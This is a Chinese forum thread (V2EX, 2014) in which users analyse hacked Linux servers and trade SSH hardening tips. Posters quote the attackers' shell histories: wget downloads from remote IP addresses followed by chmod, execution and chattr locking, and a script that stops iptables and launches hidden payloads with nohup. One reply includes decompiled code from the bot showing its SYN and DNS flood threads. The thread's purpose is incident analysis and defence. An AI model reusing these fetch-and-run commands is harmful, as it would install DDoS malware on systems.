服务器被入侵，麻烦高手帮忙分析下

服务器被入侵，密码被改了，流量一下跑了很多，麻烦高手帮忙分析下，这位黑兄拿我服务器干嘛了
root@(none):~# ls
bulong conf.n fake.cfg ssh33 wget-log.1
bulong.1 dlcfg getsetup.hb wget-log

root@(none):~# history
1 uptime
2 ps -aux
3 exit
4 free -m
5 df -h
6 passwd
7 ps -ef
8 wget http://222.186.40.170:666/getsetup.hb
9 chmod +x getsetup.hb
10 ./getsetup.hb
11 chattr +i getsetup.hb
12 wget http://96.44.185.98:8080/ssh33
13 chmod +x ssh33
14 ./ssh33
15 chattr +i ssh33
16 wget http://23.228.102.152:1818/bulong
17 ps -ef
18 wget http://23.228.102.152:1818/bulong
19 wget http://222.186.40.170:666/bulong
20 chmod +x bulong
21 ./bulong
22 chattr +i bulong
23 ps -ef
24 ls
25 history

root@(none):/var/log# last
root pts/1 111.8.2.138 Mon Jul 7 04:22 still logged in
reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:22 - 04:33 (00:10)
reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:16 - 04:20 (00:04)
root pts/0 58.22.113.155 Sun Jul 6 16:42 - 16:46 (00:03)
root pts/1 58.22.113.155 Sun Jul 6 16:08 - 16:11 (00:03)
root pts/0 58.22.113.155 Sun Jul 6 16:05 - 16:11 (00:06)
root pts/0 27.158.25.16 Sun Jul 6 04:41 - 04:41 (00:00)
root pts/0 ns405606.ip-37-1 Sat Jul 5 11:07 - 11:07 (00:00)
root pts/0 119.39.233.73 Wed Jul 2 14:01 - 16:50 (02:49)
root pts/0 119.39.233.73 Wed Jul 2 13:58 - 13:59 (00:00)
reboot system boot 3.15.3-x86_64-li Wed Jul 2 13:57 - 23:14 (4+09:16)

evilangel

2014-07-07 16:20:22 +08:00

@wzxjohn 上传到百度网盘了，地址http://pan.baidu.com/s/1pJ9atC3 另外怎么看出来这个是DDOS服务程序的？用猜的我这种最可能的是DDOS或者服务器口令自动破解程序之类的。

@humiaozuzu 居然遇到的都是一样的。但是想不通是怎么在这么快的时间内破解我的root密码的。

henices

2014-07-07 17:38:23 +08:00

int __cdecl AddTask(int a1)
{
int v1; // ebx@1
int v2; // ebx@2
int v4; // eax@6
int v5; // edi@6
int v6; // eax@7
int v7; // eax@11
int v8; // eax@13

pthread_mutex_lock(TaskLockMutex);
v1 = taskcount;
if ( (unsigned int)taskcount > 0x13 )
{
v2 = taskcount + 33554432;
goto LABEL_3;
}
if ( CheckTaskExist(a1 + 80) )
{
v2 = v1 + 536870912;
goto LABEL_3;
}
v4 = malloc(132);
v5 = v4;
if ( !v4 )
{
v2 = v1 + 134217728;
goto LABEL_3;
}
memcpy(v4, a1, 112);
v6 = *(_DWORD *)(v5 + 8);
if ( v6 & 1 )
{
v7 = HbCreateThread(SynFloodThread, v5, v5 + 112, 0, 1);
}
else
{
if ( !(v6 & 2) )
{
LABEL_9:
v2 = v1 + 67108864;
free(v5);
goto LABEL_3;
}
v7 = HbCreateThread(DnsFloodThread, v5, v5 + 112, 0, 1);
}
if ( v7 != 1 )
goto LABEL_9;
v8 = pMaskTask;
if ( pMaskTask )
{
*(_DWORD *)(v5 + 128) = 0;
*(_DWORD *)(v5 + 124) = v8;
*(_DWORD *)(v8 + 128) = v5;
pMaskTask = v5;
}
else
{
pMaskTask = v5;
*(_DWORD *)(v5 + 124) = 0;
*(_DWORD *)(v5 + 128) = 0;
}
__asm { lock add ds:taskcount, 1 }
v2 = taskcount + 268435456;
LABEL_3:
pthread_mutex_unlock(TaskLockMutex);
return v2;
}

evilangel

2014-07-07 18:02:33 +08:00

@markmx 厉害，膜拜了！看来后面是需要配置一下。

@humiaozuzu 我是刚装完的系统，什么软件都没装了然后才一天时间就密码被人改了登陆不上了。重置密码之后就发现目录下面有东西然后历史命令里多了这十几条命令。

@wzxjohn 嗯嗯，没太注意看，刚又看了下发现了。谢谢了！

@henices 牛！！！

oldcai

2014-07-09 14:51:16 +08:00

我也碰到同样的事情了，elasticsearch漏洞导致远程执行。
前几天被服务商告知在发出ddos攻击，我还不太相信，因为我一直都只用公私钥，不用密码登陆。

从log里面看来，一直在执行下面的东西。
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
chmod 0775 /usr/bin/wget
mkdir /etc/plngius
killall .Linux_time_y_2014
rm -r -f /etc/plngius/.Linux_time_y_2014
wget -O /etc/plngius/.Linux_time_y_2014 http://119.1.109.43:4443/txma
chmod 0755 /etc/plngius/.Linux_time_y_2014
nohup /etc/plngius/.Linux_time_y_2014 > /dev/null 2>&1 &
killall .Linux_time_y_2015
rm -r -f /tmp/.Linux_time_y_2015
wget -O /tmp/.Linux_time_y_2015 http://119.1.109.43:4443/xudp
chmod 0755 /tmp/.Linux_time_y_2015
nohup /tmp/.Linux_time_y_2015> /dev/null 2>&1 &
exit

pythoner

2014-07-09 21:51:25 +08:00

@jalen

1，修改ssh的默认端口
2，禁止root账号登陆
3，新建一个账号(不要用admin之类容易猜到的账号，并设置一个复杂的密码)并让其可以sudo su成root
4，用DenyHosts防止暴力破解将对方尝试破解的ip拒绝掉

我贴一个日志：

tail -n 1000 auth.log |grep 'Failed password for root '
Jul 9 20:26:02 s1 sshd[30294]: Failed password for root from 61.128.110.39 port 45014 ssh2
Jul 9 20:26:06 s1 sshd[30311]: Failed password for root from 61.128.110.39 port 46366 ssh2
Jul 9 20:26:09 s1 sshd[30459]: Failed password for root from 61.128.110.39 port 47481 ssh2

从上面的日志可以看到对方在尝试不同的端口号，由于我禁止了root账号登陆，所以就算端口号猜对了也会失败，失败3次之后 61.128.110.39就自动被防火墙拒绝掉（/etc/hosts.deny ）

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/121336

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.